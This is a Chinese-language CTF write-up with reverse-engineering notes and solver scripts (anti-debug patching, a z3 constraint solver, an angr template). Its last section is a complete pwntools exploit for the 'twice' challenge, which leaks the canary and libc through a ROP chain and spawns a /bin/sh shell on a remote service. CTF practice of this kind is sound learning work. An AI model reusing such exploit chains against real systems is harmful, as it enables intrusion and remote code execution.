Nop
首先进去后有两个地方的反调试我们nop掉
这两个位置nop掉,后进行分析
这是整理好的文件,大概看到了 eax 的三次 ++,以及一次加法,也就是 eax + 0xCCCCCCCF
主要问题在这里:前面 nop 掉了两处地址,所以下面的那个 jmp 只需要跳到 right,反推时减去 0xCCCCCCCF 即可
0x108048765-0xCCCCCCCF= 93,507,990
ManageCode
我们对应的 RVA。这里学到了用 OD 调试 C# 程序的一点:C# 程序的导入表里只有 mscoree._CorExeMain 这一个函数,其余都由框架处理了
z3解方程即可,这里也学到了z3解方程的知识
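from z3 import *

# Solver script for the 16 linear constraints recovered from the checker.
# The decompiled routine indexes the input buffer as ``a1``; the listing
# built the symbolic vector under the name ``flag`` but then referenced
# ``a1``, which was never defined (NameError).  Bind both names to the same
# vector so the constraints can stay exactly as transcribed.
s = Solver()
flag = [Int('x%d' % i) for i in range(32)]
a1 = flag

# NOTE(review): the checker most likely works on 32-bit machine integers;
# modelling with unbounded ``Int`` ignores wraparound.  If the model comes
# back unsat or with out-of-range values, switch to BitVec(32) and
# compare the products modulo 2**32 — verify against the binary.

v2 = a1[0]
v33 = a1[0]
v3 = a1[2]
v31 = a1[2]
s.add(-307337 * v2 == -29811689)
v4 = a1[1]
v32 = a1[1]
s.add(31219 * v2 - 470462 * v4 == -7321921)
v5 = 282799 * v4
v6 = a1[3]
v30 = a1[3]
s.add(v5 + 145509 * v3 - 299180 * v33 == 13723877)
s.add(475769 * v6 - 175678 * v32 - 389730 * v3 - 482630 * v33 == -95216128)
v29 = a1[4]
s.add(-491556 * v33 - 36988 * v29 + 107882 * v32 + -208516 * v6 - 340530 * v3 == -159608574)
v8 = a1[5]
v27 = v8
s.add(115318 * v8 + 467004 * v33 + 110069 * v29 + 82828 * v31 - 14270 * v32 - 303753 * v6 == 59922906)
v9 = a1[6]
v28 = v9
s.add(-279354 * v8 - 301605 * v30 + 336041 * v33 + 45022 * v31 + 111726 * v32 - 146340 * v29 - 237939 * v9 == -82351664)
v10 = a1[7]
v26 = v10
s.add(-147932 * v29 - 23111 * v27 + 356418 * v30 + 157129 * v9 + 96850 * v31 + 459807 * v10 + -239175 * v33 - 15611 * v32 == 54529836)
v11 = a1[8]
v25 = v11
s.add(-288572 * v10 - 452860 * v11 - 281026 * v31 + 459847 * v29 + 105871 * v32 + 363927 * v28 + 107668 * v33 + 305746 * v27 + 474305 * v30 == 94077867)
v12 = a1[9]
v24 = a1[9]
s.add(24450 * v32 + 318367 * v27 + 131436 * v33 + 163730 * v31 + 68350 * v30 + -200364 * v12 - 367700 * v26 - 298737 * v11 - 26977 * v28 - 411916 * v29 == -20388052)
v15 = a1[10]
v23 = v15
s.add(23830 * v31 + 389775 * v26 + 301398 * v32 + 367177 * v27 + 311452 * v30 - 434957 * v12 - 136393 * v15 - 172925 * v25 - 146025 * v33 - 493051 * v28 - 130882 * v29 == -88920064)
v16 = a1[11]
v22 = v16
s.add(-427662 * v33 - 98903 * v29 - 17320 * v15 - 218483 * v32 - 85741 * v30 + 363857 * v26 + 163521 * v16 + 304649 * v27 + -43728 * v25 - 181088 * v31 + 173715 * v24 + 14457 * v28 == -61620324)
v17 = a1[12]
v21 = v17
# ``v23 << 15`` is not defined on a z3 Int (only BitVec supports shifts);
# the decompiled shift of an integer is the same as multiplying by 2**15.
s.add(-195542 * v27 - 498833 * v32 - 412336 * v24 - 216657 * v29 - 501433 * v16 + 271173 * v31 + 74652 * v30 + 373303 * v28 - 306925 * v25 - 338825 * v26 - 475559 * v33 - 358450 * v17 - v23 * (1 << 15) == -174934821)
v18 = a1[13]
# NOTE(review): this is the only constraint written with ``!=``; if it came
# from an inverted branch in the decompilation it is probably meant to be
# ``==`` like the others — confirm against the checker before trusting it.
s.add(110210 * v22 + -351890 * v31 - 184149 * v24 - 437072 * v17 + 324022 * v28 + 357830 * v25 + 162554 * v26 + 369921 * v32 + 142164 * v29 + 136219 * v23 + 49387 * v33 - 323429 * v18 - 198716 * v30 - 411630 * v27 != -124829042)
v19 = a1[14]
s.add(473866 * v23 + -257967 * v32 - 222834 * v26 - 118361 * v25 + 426304 * v33 + 507378 * v19 + 362998 * v21 - 342754 * v27 - 266674 * v24 - 61369 * v18 - 267106 * v29 - 388543 * v22 - 97045 * v28 - 229602 * v31 - 84816 * v30 == 78977681)
s.add(402402 * v23 + 477363 * v29 + 447356 * v27 + 46659 * v22 + -89442 * v25 - 455802 * v28 - 290697 * v33 - 108648 * v18 + 279039 * v19 + 520878 * v24 + 335538 * v32 + 310844 * v31 + 110817 * v26 - 433259 * a1[15] - 525875 * v21 - 2295 * v30 == 80694627)

# Parenthesised prints keep the script valid under both Python 2 and 3.
if s.check() == sat:
    print("sat")
    print(s.model())
else:
    print("un")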
rev
直接看到是个虚拟机,判断条件不是很多,直接上 angr 一梭子。脚本是网上找的模板,也是之前科二师傅给我的模板
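import angr
import sys
import claripy


def main(argv):
    """Search for a command-line argument that makes the binary print ``right``.

    Args:
        argv: process arguments; ``argv[1]`` is the path of the binary to
            analyse.  It is run with a single 100-byte symbolic argument.

    Prints the recovered argument (NUL padding stripped), or a message when
    no state that writes ``right`` to stdout is reached.
    """
    if len(argv) < 2:
        # The template dereferenced argv[1] unguarded and died with IndexError.
        print("usage: {} <binary>".format(argv[0]))
        return
    bin_path = argv[1]
    p = angr.Project(bin_path)
    # 100 symbolic bytes for argv[1]; the length is the template's default.
    argv1 = claripy.BVS("argv1", 100 * 8)
    init_state = p.factory.entry_state(args=[bin_path, argv1])
    sim = p.factory.simulation_manager(init_state)

    def is_good(state):
        """Success: the program has written 'right' to stdout (fd 1)."""
        return b'right' in state.posix.dumps(1)

    def is_bad(state):
        """Prune: the program has already written 'wrong' to stdout."""
        return b'wrong' in state.posix.dumps(1)

    sim.explore(find=is_good, avoid=is_bad)

    if sim.found:
        found_state = sim.found[0]
        print("Flag: {}".format(found_state.posix.dumps(0)))
        print()
        solution = found_state.solver.eval(argv1, cast_to=bytes)
        # Decode to str first, then drop the NUL padding of the 100-byte buffer.
        print(bytes.decode(solution).strip('\x00'))
    else:
        print("cannot found a solution")


if __name__ == "__main__":
    main(sys.argv)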
twice
| #!/usr/bin/python2.7 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" context.arch = "amd64" #"i386" exe = './pwn' elf = ELF(exe) # p = process(exe) #p = process(['exe'],env={"LD_PRELOAD":"libc"}) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = remote('121.36.59.116',9999) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #------------------------------------ def d(s = ''): gdb.attach(p,s)
def pwn(): # d("b *0x400844") payload = '\x11'*0x59 p.send(payload) p.recvuntil("\x11"*0x58) cananry = u64(p.recv(8)) - 0x11 stack_addr = u64(p.recv(6).ljust(8,'\x00'))- 0x70 payload = p64(0x0000000000400923)+p64(elf.got['puts'])+p64(elf.plt['puts']) payload += p64(0x00000000040087B)+p64(0)*6 payload += p64(stack_addr)+p64(cananry) + p64(stack_addr-8) payload += p64(0x0000000000400879) # payload1 += p64(stack_addr) p.send(payload)
p.recvline() p.recvline()
libc.address = u64(p.recv(6).ljust(8,'\x00')) - 0x6f690
payload2 = p64(0x0000000000400923) + p64(libc.search("/bin/sh\x00").next()) + p64(libc.sym['system']) payload2 += p64(0)*8 + p64(cananry) + p64(stack_addr-0x60) + p64(0x0000000000400879) p.sendline("\x11"*0x10) p.sendline(payload2) p.interactive() #-------------------------------------
pwn()